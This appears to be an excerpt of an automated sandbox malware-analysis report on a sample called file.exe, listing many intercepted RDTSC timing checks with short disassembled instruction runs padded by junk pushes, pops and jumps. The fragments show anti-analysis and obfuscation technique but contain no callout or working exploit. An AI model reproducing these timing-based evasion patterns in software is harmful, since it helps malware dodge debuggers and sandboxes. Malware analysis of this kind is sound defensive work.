                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A3F2 second address: B4A428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 xor dword ptr [esp], 765891B9h 0x0000000d jmp 00007FF154CE361Fh 0x00000012 push 4B063835h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007FF154CE361Fh 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A654 second address: B4A66B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF154EB2266h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A66B second address: B4A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A66F second address: B4A6A8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF154EB2274h 0x00000016 popad 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c je 00007FF154EB2274h 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FF154EB2266h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87EB1 second address: B87EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88403 second address: B8840F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8840F second address: B88415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8855B second address: B88561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88561 second address: B88565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88565 second address: B88598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2277h 0x00000007 jmp 00007FF154EB2274h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88708 second address: B88715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF154CE3616h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88715 second address: B8871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8871D second address: B88723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8BA95 second address: B8BA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8EC56 second address: B8EC71 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF154CE361Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8EC71 second address: B8EC7B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF154EB226Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E68C second address: B8E69C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF154CE3616h 0x00000008 jne 00007FF154CE3616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E69C second address: B8E6A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E7F2 second address: B8E819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FF154CE361Fh 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E819 second address: B8E81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E975 second address: B8E98A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3620h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E98A second address: B8E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9374E second address: B93754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93754 second address: B93758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93027 second address: B9305B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE3625h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF154CE3628h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9305B second address: B93069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B93069 second address: B93072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B931C1 second address: B931C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B934AB second address: B934B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97A87 second address: B97A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97A96 second address: B97A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97A9C second address: B97AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jno 00007FF154EB2266h 0x0000000f jmp 00007FF154EB2278h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97E12 second address: B97E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B97F74 second address: B97F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B980BA second address: B980BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B980BE second address: B980CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF154EB2272h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B980CC second address: B980D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9821F second address: B9822E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9822E second address: B98232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98232 second address: B98236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D4C second address: B98D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007FF154CE3616h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D60 second address: B98D6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D6A second address: B98D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D70 second address: B98D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D74 second address: B98D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007FF154CE3616h 0x0000000d jmp 00007FF154CE361Dh 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jng 00007FF154CE3616h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98D9D second address: B98DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98DA1 second address: B98DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98DAD second address: B98DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D015 second address: B9D01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D01B second address: B9D025 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154EB226Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D025 second address: B9D03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 js 00007FF154CE3616h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FF154CE3622h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D03D second address: B9D047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D047 second address: B9D052 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FF154CE3616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C1BC second address: B9C1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF154EB2266h 0x0000000a pushad 0x0000000b jbe 00007FF154EB2266h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C1D0 second address: B9C1E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3620h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C34A second address: B9C350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C350 second address: B9C359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C498 second address: B9C49D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C49D second address: B9C4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FF154CE3625h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C65A second address: B9C664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CAB7 second address: B9CAE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE361Dh 0x00000008 jmp 00007FF154CE3628h 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9CAE3 second address: B9CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF154EB2266h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push esi 0x0000000f jno 00007FF154EB2266h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA43F4 second address: BA4402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154CE3616h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2372 second address: BA2376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24C0 second address: BA24CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24CC second address: BA24D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24D0 second address: BA24E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24E0 second address: BA24F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007FF154EB2266h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24F0 second address: BA24F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA24F4 second address: BA2509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2271h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2636 second address: BA2641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2641 second address: BA2645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2645 second address: BA2660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007FF154CE361Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2948 second address: BA294C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2C0A second address: BA2C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnl 00007FF154CE3616h 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA2EFA second address: BA2F04 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF154EB2282h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA31CC second address: BA3205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FF154CE3620h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF154CE3623h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 jbe 00007FF154CE3635h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3205 second address: BA3218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB226Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3DD7 second address: BA3DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3DDB second address: BA3DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3DDF second address: BA3DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA40C0 second address: BA40E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA40E3 second address: BA4107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF154CE3629h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9944 second address: BA9949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD684 second address: BAD698 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3616h 0x00000008 jl 00007FF154CE3616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC957 second address: BAC95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAC95D second address: BAC961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACAA6 second address: BACAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACD64 second address: BACD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACD6F second address: BACD7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACD7A second address: BACD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACEBE second address: BACEF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 jmp 00007FF154EB2276h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF154EB2270h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACEF7 second address: BACEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACEFD second address: BACF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jl 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007FF154EB2266h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACF15 second address: BACF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF154CE3622h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BACF30 second address: BACF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD1E5 second address: BAD251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE3629h 0x00000009 jmp 00007FF154CE3627h 0x0000000e popad 0x0000000f jmp 00007FF154CE361Ch 0x00000014 pushad 0x00000015 jmp 00007FF154CE3623h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007FF154CE3616h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 jo 00007FF154CE3616h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD251 second address: BAD256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BAD256 second address: BAD26A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3618h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF154CE3616h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4D90 second address: BB4D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154EB2266h 0x0000000a rdtsc
